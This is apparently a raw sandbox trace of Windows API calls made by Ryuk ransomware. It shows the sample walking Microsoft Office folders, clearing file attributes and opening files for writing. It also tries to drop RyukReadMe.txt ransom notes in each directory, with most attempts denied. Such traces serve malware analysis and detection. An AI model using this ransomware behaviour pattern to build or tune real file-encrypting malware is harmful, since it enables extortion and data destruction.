FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.783] SetLastError (dwErrCode=0x0) [0131.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.783] GetLastError () returned 0x5 [0131.783] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.783] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.784] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.784] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML", dwFileAttributes=0x80) returned 0 [0131.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.784] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.785] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.785] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.785] SetLastError (dwErrCode=0x0) [0131.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.785] GetLastError () returned 0x5 [0131.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.786] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.786] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.786] SetLastError (dwErrCode=0x0) [0131.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.786] GetLastError () returned 0x5 [0131.786] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.786] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.788] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.788] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.789] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.789] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.789] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.789] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML", dwFileAttributes=0x80) returned 0 [0131.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.790] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.790] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.790] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.790] SetLastError (dwErrCode=0x0) [0131.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.790] GetLastError () returned 0x5 [0131.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.790] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.790] SetLastError (dwErrCode=0x0) [0131.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.791] GetLastError () returned 0x5 [0131.791] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.791] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.791] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.791] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.791] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.792] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.792] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.792] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML", dwFileAttributes=0x80) returned 0 [0131.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.792] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.792] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.792] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.793] SetLastError (dwErrCode=0x0) [0131.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.793] GetLastError () returned 0x5 [0131.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.793] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.793] SetLastError (dwErrCode=0x0) [0131.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.793] GetLastError () returned 0x5 [0131.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.793] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.794] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.794] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.794] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.795] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.795] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.795] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML", dwFileAttributes=0x80) returned 0 [0131.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.795] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.795] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.795] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.795] SetLastError (dwErrCode=0x0) [0131.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.796] GetLastError () returned 0x5 [0131.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.796] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.796] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.796] SetLastError (dwErrCode=0x0) [0131.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.796] GetLastError () returned 0x5 [0131.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.796] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.796] SetLastError (dwErrCode=0x0) [0131.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.796] GetLastError () returned 0x5 [0131.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.797] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.797] SetLastError (dwErrCode=0x0) [0131.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.797] GetLastError () returned 0x5 [0131.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.797] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.797] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.797] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms", dwFileAttributes=0x80) returned 0 [0131.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.798] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.798] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF", dwFileAttributes=0x80) returned 0 [0131.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.799] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.799] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.799] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.799] SetLastError (dwErrCode=0x0) [0131.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.802] GetLastError () returned 0x5 [0131.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.802] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.802] SetLastError (dwErrCode=0x0) [0131.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.802] GetLastError () returned 0x5 [0131.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.802] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.803] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.803] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.803] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX", dwFileAttributes=0x80) returned 0 [0131.804] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: 